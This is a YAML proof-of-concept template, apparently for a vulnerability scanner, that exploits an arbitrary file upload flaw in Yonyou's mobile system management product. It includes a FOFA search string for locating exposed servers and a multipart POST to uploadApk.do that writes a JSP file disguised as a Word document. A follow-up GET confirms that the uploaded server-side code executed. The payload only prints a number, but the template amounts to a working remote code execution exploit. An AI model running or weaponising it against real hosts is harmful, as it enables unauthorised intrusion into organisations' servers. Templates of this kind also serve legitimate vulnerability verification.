id: yonyou-upload

info:
  name: 用友移动系统管理任意文件上传
  author: lei_sec
  severity: critical
  verified: true
  description: |
    FOFA: app="用友-移动系统管理"
  tags: yonyou,upload
  created: 2023/07/07

set:
  randstr: randomLowercase(16)
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /maportal/appmanager/uploadApk.do?pk_obj=0001A1100000000H66QB 
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
        Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"downloadpath\";filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: application/msword\r\n\
        \r\n\
        <%out.print({{r1}} * {{r2}});%>\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /maupload/apk/{{randstr}}.jsp
    expression: response.body.bcontains(bytes(string(r1 * r2)))
expression: r0() && r1()
